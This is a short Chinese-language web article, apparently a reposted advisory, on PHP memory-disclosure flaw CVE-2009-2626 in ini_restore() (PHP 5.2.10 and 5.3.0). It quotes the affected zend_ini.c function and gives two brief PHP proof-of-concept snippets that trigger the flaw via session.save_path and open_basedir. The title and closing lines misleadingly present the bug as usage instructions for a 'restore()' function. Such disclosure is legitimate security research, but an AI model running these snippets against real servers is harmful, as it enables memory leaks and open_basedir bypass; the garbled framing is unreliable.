PHP函數(shù)restore()重置PHP配置環(huán)境
作者:佚名
我們可以運用PHP函數(shù)restore()重置PHP配置環(huán)境時PG()類中的變量會顯示任意部分的內(nèi)存。我們給出了詳細(xì)的使用方法,希望對大家有所幫助。
PHP作為一種功能強大的HTML嵌入式語言受到廣泛的運用,尤其適合于WEB開發(fā)中。下面我們將為大家詳細(xì)介紹有關(guān)PHP函數(shù)restore()的相關(guān)用法。#t#
影響版本:
PHP PHP 5.3.0
PHP PHP 5.2.10漏洞描述:
BUGTRAQ ID: 36009
CVE ID: CVE-2009-2626
在使用PHP函數(shù)restore()重置PHP配置環(huán)境時PG()類中的變量會顯示任意部分的內(nèi)存。如果要利用這個漏洞,攻擊者必須要通過ini_set()函數(shù)聲明變量。
- ---zend_ini.c---
- static int zend_restore_ini_entry_cb
(zend_ini_entry *ini_entry, int stage- TSRMLS_DC) /* {{{ */
- {
- if (ini_entry->modified) {
- if (ini_entry->on_modify) {
- zend_try {
- /* even if on_modify bails out, we
have to continue on with restoring,- since there can be allocated variables
that would be freed on MM- shutdown
- and would lead to memory corruption
later ini entry is modified again- */
- ini_entry->on_modify(ini_entry,
ini_entry->orig_value,- ini_entry->orig_value_length,
ini_entry->mh_arg1, ini_entry->mh_arg2,- ini_entry->mh_arg3, stage TSRMLS_CC);
- } zend_end_try();
- }
- if (ini_entry->value != ini_entry
->orig_value) {- efree(ini_entry->value);
- }
- ini_entry->value = ini_entry->
orig_value;- ini_entry->value_length =
ini_entry->orig_value_length;- ini_entry->modified = 0;
- ini_entry->orig_value = NULL;
- ini_entry->orig_value_length = 0;
- if (ini_entry->modifiable >= (1 << 3)) {
- ini_entry->modifiable >>= 3;
- }
- }
- return 0;
- }
- ---zend_ini.c---
PHP函數(shù)restore()所修改的標(biāo)記會被重置。由于沒有檢查ini_entry->on_modify()的值,PG()會超出內(nèi)存范圍。
PHP函數(shù)restore()測試方法:
本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險自負(fù)!
- < ?php
- ini_set("session.save_path",
"0123456789ABCDEF");- ini_restore("session.save_path");
- session_start();
- ?>
- < ?php
- ini_set("open_basedir", "A");
- ini_restore("open_basedir");
- ini_get("open_basedir");
- include("B");
- ?>
以上就是PHP函數(shù)restore()的相關(guān)使用方法。
責(zé)任編輯:曹凱
來源:
百度博客
